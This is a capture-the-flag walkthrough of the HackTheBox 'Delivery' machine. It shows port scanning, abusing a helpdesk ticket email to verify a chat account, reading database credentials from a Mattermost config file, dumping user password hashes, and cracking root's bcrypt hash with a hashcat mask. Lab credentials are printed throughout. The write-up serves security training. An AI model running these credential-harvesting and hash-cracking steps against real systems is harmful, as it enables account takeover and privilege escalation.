Delivery - [HTB]

Marmeus

Introduction

Delivery is a very easy Linux machine from HackTheBox where the hacker has to find a way to validate an email address using two services installed on the machine, in order to get the user flag. Later, the root hash has to be found, stored in a web application database. Finally, in order to obtain the root password, the hash has to be cracked using hashcat rules.

Enumeration

As always, let's start by finding all open ports on the machine with nmap.

kali@kali:$ sudo nmap -sS -T5 -p- -n --open -oN AllPorts.txt 10.129.51.179
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-09 14:39 EST
Nmap scan report for 10.129.51.179
Host is up (0.039s latency).
Not shown: 64781 closed ports, 751 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8065/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 17.04 seconds

Then we continue with a deeper scan of every open port, getting more information about each service.

kali@kali:$ sudo nmap -sC -sV -p22,80,8065 -n -oN PortsDepth.txt 10.129.51.179
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-09 14:43 EST
Stats: 0:00:06 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 33.33% done; ETC: 14:43 (0:00:12 remaining)
Nmap scan report for 10.129.51.179
Host is up (0.039s latency).    
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 9c:40:fa:85:9b:01:ac:ac:0e:bc:0c:19:51:8a:ee:27 (RSA)
|   256 5a:0c:c0:3b:9b:76:55:2e:6e:c4:f4:b9:5d:76:17:09 (ECDSA)
|_  256 b7:9d:f7:48:9d:a2:f2:76:30:fd:42:d3:35:3a:80:8c (ED25519)
80/tcp   open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Welcome
8065/tcp open  unknown
| fingerprint-strings:
|   GenericLines, Help, RTSPRequest, SSLSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Accept-Ranges: bytes
|     Cache-Control: no-cache, max-age=31556926, public
|     Content-Length: 3108
|     Content-Security-Policy: frame-ancestors 'self'; script-src 'self' cdn.rudderlabs.com
|     Content-Type: text/html; charset=utf-8
|     Last-Modified: Wed, 06 Jan 2021 13:40:04 GMT
|     X-Frame-Options: SAMEORIGIN
|     X-Request-Id: 9c5e8n7nxbreix9js5ejzn5ero
|     X-Version-Id: 5.30.0.5.30.1.57fb31b889bf81d99d8af8176d4bbaaa.false
|     Date: Sat, 09 Jan 2021 19:43:32 GMT
|     <!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><meta name="robots" content="noindex, nofollow"><meta name="referrer" content="no-referrer"><title>Mattermost</title><meta name="mobile-web-app-capable" content="yes"><meta name="application-name" content="Mattermost"><meta name="format-detection" content="telephone=no"><link re
|   HTTPOptions: 
|     HTTP/1.0 405 Method Not Allowed
|     Date: Sat, 09 Jan 2021 19:43:32 GMT
|_    Content-Length: 0

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 90.97 seconds

On port 80 there is a static web page named "DELIVERY" with a "Contact us" button.

deliveryWeb

Clicking on it, we can see two links, http://helpdesk.delivery.htb/ and http://delivery.htb:8065/, each pointing to a different service and domain.

Contact us

On one side, at helpdesk.delivery.htb we find a ticketing system built on osTicket, where we can create tickets to get in contact with the support center.

In order to create an account we need to verify an email address. This is impossible because HTB machines don't have access to the Internet, so we cannot receive any email at our personal accounts.

Support Center

On the other side, delivery.htb:8065 turns out to be a Mattermost service (an open-source, self-hostable online chat service) that also requires validating the email address when signing up.

Mattermost

Exploitation

We can obtain an email address by creating a ticket in the Help Desk.

Ticket creation
Ticket request created

Anything sent to that email address is appended to the ticket. Hence, we can use the address to verify the email in the Mattermost service.

Mattermost web page
Mattermost email verify

Then we need to check the ticket status, obtaining the verification link.

Note: You need to provide the email address used to open the ticket.

Check ticket status
Checking received email

Finally, sign in with the user you created, skip the tutorial and click on "Internal": there you will find the credentials to log in to the machine as maildeliverer through SSH (getting the user flag). Furthermore, these credentials can also be used to sign in at http://helpdesk.delivery.htb/scp/users.php

maildeliverer:Youve_G0t_Mail!

Privilege escalation

Welcome message

In the previous picture the root user says that if an attacker gets all the hashes from the web application, he or she will be able to retrieve the password using HashCat. According to the Mattermost documentation, the MySQL credentials are stored at /opt/mattermost/config/config.json.

maildeliverer@Delivery:~$ cat /opt/mattermost/config/config.json
[...]
   "SqlSettings": {
       "DriverName": "mysql",
       "DataSource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s\u0026writeTimeout=30s",
       "DataSourceReplicas": [],
       "DataSourceSearchReplicas": [],
       "MaxIdleConns": 20,
       "ConnMaxLifetimeMilliseconds": 3600000,
       "MaxOpenConns": 300,
       "Trace": false,
       "AtRestEncryptKey": "n5uax3d4f919obtsp1pw1k5xetq1enez",
       "QueryTimeout": 30,
       "DisableDatabaseSearch": false
   },
[...]

The credentials are:

mmuser:Crack_The_MM_Admin_PW

Now we can extract all the hashes from the database.

maildeliverer@Delivery:~$ mysql -u mmuser -pCrack_The_MM_Admin_PW
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mattermost         |
+--------------------+
MariaDB [(none)]> use mattermost;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [mattermost]> show tables;
+------------------------+
| Tables_in_mattermost   |
+------------------------+
           [...]
| Users                  |
+------------------------+
MariaDB [mattermost]> select Username, Password from Users;
+----------------------------------+--------------------------------------------------------------+
| Username                         | Password                                                     |
+----------------------------------+--------------------------------------------------------------+
| surveybot                        |                                                              |
| c3ecacacc7b94f909d04dbfd308a9b93 | $2a$10$u5815SIBe2Fq1FZlv9S8I.VjU3zeSPBrIEg9wvpiLaS7ImuiItEiK |
| marmeus                          | $2a$10$1uIPq5C5LMTmwoK7QYLV6.h6K3.m9ya03dgTF03CzXnweUcEI3zbC |
| 5b785171bfb34762a933e127630c4860 | $2a$10$3m0quqyvCE8Z/R1gFcCOWO6tEj6FtqtBn8fRAXQXmaKmg.HDGpS/G |
| root                             | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO |
| ff0a21fc6fc2488195e16ea854c963ee | $2a$10$RnJsISTLc9W3iUcUggl1KOG9vqADED24CQcQ8zvUm1Ir9pxS.Pduq |
| channelexport                    |                                                              |
| 9ecfb4be145d47fda0724f697f35ffaf | $2a$10$s.cLPSjAVgawGOJwB7vrqenPg2lrDtOECRtjwWahOzHfq1CoFyFqm |
+----------------------------------+--------------------------------------------------------------+
8 rows in set (0.000 sec)

Now we can use HashCat to get root's password. For that I used hashcat for Windows, which you can download here. But first we need to identify which type of hash we are working with, so I am using hashid.

kali@kali:$ hashid
$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO      
Analyzing '$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO'
[+] Blowfish(OpenBSD) 
[+] Woltlab Burning Board 4.x 
[+] bcrypt 

Based on what the user "root" said in the Mattermost chat, I created my own mask, which tries digits, lowercase and uppercase letters at the end of PleaseSubscribe!, retrieving the password in a couple of seconds.

Note: You could also try obtaining the root password by applying predefined hashcat rules such as base64.

D:\Users\Marmeus\Downloads\hashcat-6.1.1>hashcat.exe -m 3200 -a 3 hash.txt -1 ?l?u?d PleaseSubscribe!?1?1?1 --increment --increment-min 16  
hashcat (v6.1.1) starting...
* Device #1: CUDA SDK Toolkit installation NOT detected.       
CUDA SDK Toolkit installation required for proper device support and utilization Falling back to OpenCL Runtime
* Device #1: WARNING! Kernel exec timeout is not disabled.  
This may cause "CL_OUT_OF_RESOURCES" or related errors.
To disable the timeout, see http://hashcat.net/q/timeoutpatch
* Device #2: Unstable OpenCL driver detected!      
This OpenCL driver has been marked as likely to fail kernel compilation or to produce false negatives.
You can use --force to override this, but do not report related errors.
nvmlDeviceGetFanSpeed(): Not Supported
OpenCL API (OpenCL 1.2 CUDA 11.0.140) - Platform #1 [NVIDIA Corporation]
======================================================================== 
* Device #1: GeForce GTX 960M, 1664/2048 MB (512 MB allocatable), 5MCU                                 
OpenCL API (OpenCL 2.1 ) - Platform #2 [Intel(R) Corporation]                                       
=============================================================                                         
* Device #2: Intel(R) HD Graphics 530, skipped     
Minimum password length supported by kernel: 0     
Maximum password length supported by kernel: 72     
INFO: All hashes found in potfile! Use --show to display them.                                       
Started: Sun Jan 10 01:43:37 2021                   
Stopped: Sun Jan 10 01:43:39 2021                   
D:\Users\Marmeus\Downloads\hashcat-6.1.1>hashcat.exe -m 3200 -a 3 hash.txt -1 ?l?u?d PleaseSubscribe!?1?1?1 --increment --increment-min 16 --show                                           
$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO:PleaseSubscribe!21                       
D:\Users\Marmeus\Downloads\hashcat-6.1.1>  
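To see why the mask above finishes in seconds despite bcrypt's cost factor, here is an added Python helper (not part of the original write-up) that parses the root bcrypt string from the Users table and computes the number of candidates a hashcat -a 3 mask yields, including the --increment / --increment-min semantics used in the command; the charset definitions follow hashcat's built-ins and the custom -1 charset is passed in as a dict.

```python
import math
import re
import string

# hashcat built-in charsets: ?s is space plus the 32 ASCII punctuation marks.
BUILTIN = {"l": string.ascii_lowercase, "u": string.ascii_uppercase,
           "d": string.digits, "s": " " + string.punctuation}
BUILTIN["a"] = "".join(BUILTIN[k] for k in "luds")   # 95 printable ASCII chars
BCRYPT_RE = re.compile(r"^\$(2[abxy]?)\$(\d{2})\$([./A-Za-z0-9]{53})$")
ROOT_HASH = "$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO"  # from the Users table above

def parse_bcrypt(h):
    """Split a Modular Crypt bcrypt string into variant, cost factor, salt and digest."""
    m = BCRYPT_RE.match(h)
    if not m:
        raise ValueError("not a bcrypt hash: %r" % h)
    variant, cost, body = m.groups()
    return {"variant": variant, "cost": int(cost), "rounds": 2 ** int(cost),
            "salt": body[:22], "digest": body[22:]}

def expand_charset(spec, custom):
    """Turn a '?l?u?d'-style spec into a set of characters; '??' is a literal '?'."""
    chars, i = set(), 0
    while i < len(spec):
        if spec[i] == "?" and i + 1 < len(spec):
            key = spec[i + 1]
            chars |= {"?"} if key == "?" else set(BUILTIN.get(key) or custom[key])
            i += 2
        else:
            chars.add(spec[i])
            i += 1
    return chars

def mask_keyspace(mask, custom_specs=None, increment=False, increment_min=1, increment_max=None):
    """Number of candidates a hashcat -a 3 mask yields; --increment sums the mask prefixes."""
    custom = {k: expand_charset(v, {}) for k, v in (custom_specs or {}).items()}
    sizes, i = [], 0
    while i < len(mask):                       # one charset size per mask position
        if mask[i] == "?" and i + 1 < len(mask):
            sizes.append(len(expand_charset(mask[i:i + 2], custom)))
            i += 2
        else:
            sizes.append(1)                    # literal character, one choice
            i += 1
    if not increment:
        return math.prod(sizes)
    hi = min(increment_max or len(sizes), len(sizes))
    return sum(math.prod(sizes[:n]) for n in range(increment_min, hi + 1))
```

For the command shown above the whole keyspace is 1 + 62 + 62^2 + 62^3 = 242,235 candidates, so dividing that by the bcrypt rate you measure on your own hardware gives the worst-case runtime; a password prefix known to the attacker collapses a cost-10 bcrypt hash to a few minutes at most.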

Finally, we can use this password to become root, getting the root flag.

maildeliverer@Delivery:/opt/mattermost/config$ su root
Password: PleaseSubscribe!21
root@Delivery:/opt/mattermost/config# wc -c /root/root.txt 
33 /root/root.txt